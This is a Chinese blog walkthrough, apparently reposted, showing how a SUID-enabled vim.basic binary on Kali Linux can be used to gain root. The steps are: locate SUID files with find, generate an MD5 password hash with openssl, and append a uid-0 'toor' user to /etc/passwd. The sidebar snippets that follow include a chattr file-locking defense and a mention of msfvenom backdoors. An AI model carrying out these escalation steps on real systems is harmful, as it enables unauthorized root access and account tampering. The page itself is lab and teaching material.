linux防范文件提权,Linux使用suid vim.basic文件实现提权

最新推荐文章于 2022-10-09 01:39:56 发布
最新推荐文章于 2022-10-09 01:39:56 发布
阅读量147 收藏
点赞数
文章标签: linux防范文件提权

在kali上复现

先给需要的vim.basic文件设置suid权限

chmod u+s /usr/bin/vim.basic

先adduser test1一个普通权限用户

现在就是一个合适的提权环境

通过以下命令可以找到存在suid权限的文件

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;

可用于提权的文件有

nmap

vim

find

bash

more

less

nano

cp

1-200I1223Z7.png

利用vim提权的思路是修改etc/passwd文件,为自己添加一个有root权限的用户

passwd文件用户格式为:用户名:密码:uid:gid:注释:home目录:用户的shell

这边可以看看root用户的格式

root:x:0:0:root:/root:/bin/bash

(密码这部分之所以是x,是因为真正的密码存在/etc/shadow文件里)

1-200I1223Z7-50.png

生成密码:用openssl passwd -1 –salt asd 123 (这里是-1(数字1)不是L)

直接写在passwd文件里面,

1-200I1223Z7-51.png

toor:$1$asd$sTMDZlRI6L.jJEw2I.3x8.:0:0:root:/toor:/bin/bash

用vim /etc/passwd可以修改,但是在保存是会出现E212,无法保存,提示我们没有权限修改这个

1-200I1223Z8.png

这时应该用之前find找到的vim.basic文件运行,这个程序是有suid权限的。绝对可以修改

vim.basic /etc/passwd

用这个打开,然后修改文件,就可以成功保存

1-200I1223Z8-50.png

可以看到已经添加了,su toor切换,密码123,再id查看一下权限

1-200I1223Z8-51.png

root权限

chmod u+s /usr/bin/vim.basic

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持服务器之家。

原文链接:https://www.cnblogs.com/This-is-Y/p/13211224.html

碗丸
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
服务器运维|linux系统锁定关键系统文件防止提权篡改
数字化小李的博客
12-03 585
服务器的运维中个,linux系统锁定关键系统文件防止提权篡改尤其重要。简单操作如下:/上锁:[root@muban ~]# chattr +i /etc/passwd /etc/shadow /etc/group /etc/gshadow /etc/inittab/解锁:[root@muban ~]# chattr -i /etc/passwd /etc/shadow /etc/group /etc/gshadow /etc/inittab
Unix /ubuntu 下装vim编辑器 和简单使用
en&ha
09-03 1788
 一 vim编辑器   1.vim编辑器简介     vim编辑器是Unix系统最初的编辑器。它使用控制台图形模式来模拟文本编辑窗口,允许查看文件中的行、在文件中移动、插入、编辑和替换文本。  2.检查vim软件包    在开始研究vim编辑器之前,最好先搞明白你用的Linux系统是哪种vim软件包。在有些发行版本中安装的是完整的vim,另外还有一个vi命令的别名,就像下面所显示的Cent...
Ubuntu下选择默认编辑器
tanxs001的专栏
02-20 963
在安装了svn后,建立仓库的注释时候默认启动了Nano编辑器,相当不顺手。 解决方法: sudo update-alternatives —config editor 会列出系统中的几个编辑器,如下: 0 /bin/nano 1 /bin/ed 2 /bin/nano 3 /usr/bin/vim.basic 4 /usr/bin/vim.tiny 其中vim会有
Linux shell 学习笔记(6)— vim 编辑器使用方法及技巧
wohu1104的专栏
05-15 460
vim编辑器 检查 vim 软件包 CentOS 发行版 $ alias vi alias vi='vim' $ $ which vim /usr/bin/vim $ $ ls -l /usr/bin/vim -rwxr-xr-x. 1 root root 1967072 Apr 5 2012 /usr/bin/vim $ ​ Ubuntu 发行版 在Ubuntu发行版中不仅没有vi命令...
linuxvim介绍
高压锅博客
02-14 194
01 vim vim = vi improved vim 是从 vi 发展出来的一个文本编辑器,支持 代码补全、编译 及 错误跳转 等方便编程的功能特别丰富,在程序员中被广泛使用,被称为 编辑器之神 查询软连接命令 在很多 Linux 发行版中直接把 vi 做成 vim 的软连接 # 查找 vi 的运行文件 $ which vi $ ls -l /usr/bin/vi $ ls -l /...
Linux使用suid vim.basic文件实现提权
09-14
本篇文章将重点讨论如何通过SUID的`vim.basic`文件实现提权。 首先,我们要确保有一个SUID权限的`vim.basic`文件。在Kali Linux系统中,我们可以使用`chmod`命令来添加这个权限: ```bash chmod u+s /usr/bin/...
Linux提权手法总结以及 Linux提权exp集合
02-22
本文将深入探讨Linux提权的常见手法,以及如何防范和应对这些威胁。 首先,内核漏洞提权是最直接也最具破坏性的方式之一。当Linux内核存在安全漏洞时,攻击者可以利用这些漏洞执行恶意代码,从而获得root权限。例如...
Linux提权扫描脚本
最新发布
04-28
这篇文档将深入探讨Linux提权扫描的相关知识点,包括提权原理、常见提权方法、提权扫描脚本的工作机制以及如何编写和使用这样的脚本。 一、提权原理 在Linux系统中,权限分为三类:用户权限、组权限和所有者权限。...
权限提升-linux提权手法总结
01-14
通过向接受用户输入的程序注入特殊字符或通配符,有时可以触发意料之外的行为,进而实现提权。 #### 结论 Linux提权是一个复杂的过程,涉及到多方面的技术和策略。成功的提权不仅需要深入了解Linux系统的工作原理...
vim配置
YoungForYou的专栏
08-13 482
1. 安装vim:apt-get install vim后,执行命令whereis vim,可以看到返回结果: vim: /usr/bin/vim /usr/bin/vim.tiny /usr/bin/vim.basic /etc/vim /usr/bin/X11/vim /usr/bin/X11/vim.tiny /usr/bin/X11/vim.basic /usr/share/vim /u
系统渗透与防护——后门植入与SUID提权
m0_60643467的博客
10-09 1946
Msfvenom Msfvenom是MSF框架配套的攻击载荷生成器,可以用来生成木马程序,并在目标机上执行,在本地监听上线。 部分参数 -p:选择一个载荷 -f:生成的文件格式 -lhost:监听地址 -lport:监听端口 -o:输入文件名 -h:帮助 Msfvenom实验测试 Msfvenom生成后门文件 第一步,在kali生成后门文件 第二步,开启Linux靶机的root用户,并设置密码 上传后门文件至靶机 第三步,在kali中将后门文件发送到目标主机 在
Linux命令sudo实现集权(提权)管理,防止超级权限泛滥
weixin_34235105的博客
05-10 435
sudo小结1、别名要用大写2、使用“\”换行3、使用白名单策略,尽量不要赋予ALL权限(建议先关后开)4、禁止的权限放在最后,允许的权限放在前面,sudoers配置文件的权限匹配时从后到前的5、成员必须是存在的(用户必须存在)6、“!”表示禁止权限7、命令、组员、组等,用“,”分隔开(英文逗号)8、组前面一定要带“%” su命令缺点1、普通用户需要知道root密码,并且切换到root用户下,才能...
Linux基本防护和用户切换与提权
dupeng86的博客
09-24 298
用户账号安全 设置账号有效期 使用chage工具 -d 0,强制修改密码 -E yyyy-mm-dd,制定失效日期(-1quxiao) ]# chage -E 2019-12-31 zengye ]# chage -l zengye .. .. Password inactive :never Account expires :Dec 31,2017 .. .. 账号的锁定/解锁...
SECURITY:Linux基本防护,用户提权,SSH,selinux
LgMizar的博客
12-28 722
文章目录用户账号安全设置账号有效期账号的锁定/解锁伪装登录提示文件系统安全锁定/解锁保护文件用户切换与提权su切换用户身份sudo提升执行权限概述配置sudo提权分析sudo提权使用情况SSH访问控制 用户账号安全 设置账号有效期 使用chage工具 – -d 0 , 强制修改密码 – -E yyyy-mm-dd , 指定失效日期(-1)取消 chage命令的语法格式: chage –l 账户...
Linux下如何让普通用户具备sudo执行权限(普通用户提权
墨痕诉清风的博客
08-26 2610
我这里的普通用户是zhangfei 首先还是需要知道root的密码 第一步:切换到root下:su,并输入密码 第二步:输入 vi/etc/sudoers,加入一行即可(zhangfei ALL=(ALL) ALL) 找到 root ALL=(ALL) ALL 加入一行即可: 将该普通用户加入权限: zhangfei ALL=(ALL) ALL...
ubuntu系统初次cron设置VIM编辑模式
u011601974的博客
01-11 808
在ubuntu下,首次编辑crontab计划任务的时候,会提示让选择编辑器。由于对nano编辑器不是很熟悉,若是选择nova编辑的话,会有些麻烦。 可以重置编辑器,方法如下: [root@wang ~]# select-editor Select an editor. To change later, run 'select-editor'. 1. /bin/ed 2. /bin/nan...
linux内核 攻击,针对Linux内核提权攻击防御方法的研究
weixin_39559895的博客
04-30 341
摘要:本文提出了一种基于Intel SMEP的轻量级的内核控制流完整性防御方法,以防御exploit-db中常见的内核提权攻击。该方案通过分离内核钩子函数的解引用和验证操作,在解引用处记录钩子函数,在敏感函数内验证钩子函数是否合法,防止恶意进程利用内核代码漏洞,修改全局函数钩子,导致内核中的敏感代码被恶意执行。关键词:Linux内核 SMEP 提权攻击中图分类号:TP393 文献标识码:A 文章编...
SUID提权
热门推荐
一只web狗
07-01 1万+
SUID提权介绍
linux防范文件提权,Linux系统容易受到X.Org服务器中的权限提升和文件覆盖漏洞攻击...
weixin_42315341的博客
04-29 134
X.Org服务器中的“不正确的命令行参数验证”漏洞使得可以升级权限以及覆盖文件。 该问题影响使用开源X Window System实现Linux和BSD发行版。这种脆弱性已存在了几年,但已被安全研究人员Narendra Shinde曝光。 如果X服务器以提升的权限运行,则非root用户可以利用未修补的系统。发布到X.Org邮件列表的安全建议解释说:“当X服务器以提升的权限运行时(即,当Xorg ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值